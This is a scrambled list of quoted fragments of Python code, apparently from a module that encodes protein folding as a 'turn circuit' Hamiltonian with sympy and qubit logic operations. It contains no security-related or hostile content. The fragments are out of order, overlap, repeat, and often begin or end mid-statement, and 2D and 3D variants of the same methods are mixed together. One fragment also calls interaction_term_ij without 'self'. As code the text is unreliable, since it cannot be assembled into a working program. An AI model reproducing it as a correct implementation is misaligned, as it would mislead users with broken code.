q_i, q_j, q_k): \"\"\"Implements", "@property def dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def", "sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+':", "p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ *", "if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h],", "the chain moves in the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k)", "if (j-i) % 2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring", "+= (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr", "'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "a circuit that returns 1 if the chain moves in the direction z+.\"\"\"", "= [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+':", "for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "!= 0 else 0 if maximum == 0: return 0 prefactor = qand([", "overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1, self.naas)]) for i", "k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string =", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self, i,", "maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "q_i * (1-q_j) * (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not", "self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i", "import math import numpy as np import sympy as sp import symengine as", "circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\"", "* self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "t+1, 2) if t > 0 else [0] else: iterator = range(1, t+1,", "qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)),", "pointer(self, i): \"\"\"Points to the start of the string describing the ith turn.\"\"\"", "sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r],", "'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "* q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "* (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return", "def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i,", "dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def", "in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([", "the direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j,", "self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0", "i > j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys():", "* (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the", "\"\"\"Points to the start of the string describing the ith turn.\"\"\" return 3*i", "maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r", "get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self,", "qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1])", "proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates", "0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r", "\"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j):", "= qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ (", "len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of the hamiltonian.\"\"\" return self.bit_list[k]", "for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in", "sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+':", "z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements", "k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back", "self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i", "not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)])", "if the chain moves in the direction y+.\"\"\" return q_i * (1-q_j) *", "that returns 1 if the chain moves in the direction x+.\"\"\" return q_i", "overlap(self, i, j): \"\"\"Computes the overlap term for residues i and j.\"\"\" maximum", "* q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\"", "in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i,", "== 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)])", "'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r])", "j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+':", "x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1", "in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j)", "elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k):", "elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)]", "in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements", "+ \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0)", "} maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0:", "chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)),", "\"\"\"Ensures that the chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for", "self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)),", "* self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\", "range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return", "that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def", "for r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([", "* (self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self):", "'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r])", "chain does not overlap.\"\"\" return sum([ sum([ self.overlap(i, j) for j in range(i+1,", "*\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1,", "the chain moves in the direction x+.\"\"\" return q_i * q_j * q_k", "== 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k", "string describing the ith turn.\"\"\" return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements", "that returns 1 if the chain moves in the direction z-.\"\"\" return (1-q_i)", "r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\", "self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return", "class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self, i):", "== 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "the kth bit of the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)),", "a circuit that returns 1 if the chain moves in the direction x+.\"\"\"", "elif k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i,", "r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1],", "self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian):", "'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r],", "for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i,", "range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for", "self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r],", "return self._sum_strings[(i, j, k)] def back_term(self): \"\"\"Ensures that the chain does not go", "j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i,", "else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i,", "returns 1 if the chain moves in the direction y+.\"\"\" return q_i*q_j def", "+ \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1,", "ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)]", "in range(2, maximum+1)])) def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j,", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)])", "* self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr)", "moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes", "maximum < 2: return sp.numbers.Integer(0) sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p", "the chain moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k)", "to keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))):", "for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator =", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r])", "meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\", "lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for t in", "circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r],", "in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "* self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in", "\"\"\"Implements a circuit that returns 1 if the chain moves in the direction", "def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim", "string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a", "self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr =", "> j: raise ValueError(\"i > j\") if (i, j, k) in self._sum_strings.keys(): return", "k): \"\"\"Computes the sum string.\"\"\" if i > j: raise ValueError(\"i > j\")", "} return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r])", "range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r])", "self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if", "'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise", "= int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0: return", "for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] +", "in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)])", "= [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-':", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y', 'z']])", "range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-':", "def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if (j-i) % 2", "return 3 def pointer(self, i): \"\"\"Points to the start of the string describing", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1,", "* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes", "range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "1 if the chain moves in the direction y+.\"\"\" return q_i * (1-q_j)", "r in range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1,", "+ \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that", "q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks", "sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_y(self,", "self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string =", "q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([", "i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)", "'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k ==", "self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "= [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y-': sum_string", "'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+':", "self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term()", "else [0] else: iterator = range(1, t+1, 2) if t > 1 else", "returns 1 if the chain moves in the direction x-.\"\"\" return q_i *", "sp import symengine as se from abc import * from tqdm import tqdm,", "range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z+': sum_string =", "maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j)", "self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def", "q_k): \"\"\"Implements a circuit that returns 1 if the chain moves in the", "[self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string =", "t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "def overlap(self, i, j): \"\"\"Computes the overlap term for residues i and j.\"\"\"", "al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings =", "'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else", "j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i,", "TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2 def pointer(self, i): \"\"\"Points", "j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\", "= list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0:", "for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for", "i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i,", "encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim ==", "q_i*(1-q_j) def circuit_yp(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the", "from itertools import chain from functools import reduce from .qlogic import * from", "return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor", "of a protein hamiltonian of the \"turn circuit encoding\" form, described by Babbush", "self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)]", "p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p", "for j in range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j):", "% k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return prefactor", "dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) *", "r in range(maximum)]) return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r],", "the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i, q_j,", "range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back on itself.\"\"\"", "= [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string", "that returns 1 if the chain moves in the direction y-.\"\"\" return q_i", "self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return", "the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i,", "in range(maximum)]) for k in ['x', 'z']]) return prefactor * \\ ( qxor(sumstring['y+'][0],", "* (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=", "penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) +", "range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0])", "\"\"\"Points to the start of the string describing the ith turn.\"\"\" return 2*i", "in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += interaction_term_ij(i, 1+i+2*j)", "bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1),", "[self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string", "self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if", "the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i, q_j):", "self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) *", "sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i,", "def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain", "j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i,", "* \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a", "['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r],", "maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r", "circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures", "for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else", "in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the chain does not overlap.\"\"\" return", "the start of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self,", "= [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'y+': sum_string", "\"\"\"Implements a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j)", "% 2 != 0 or maximum < 2: return sp.numbers.Integer(0) sumstring = {", "[1] for h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i):", "range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in", "direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self, q_i, q_j): \"\"\"Implements a circuit that returns", "-1 * self.int_mat[i, j] * 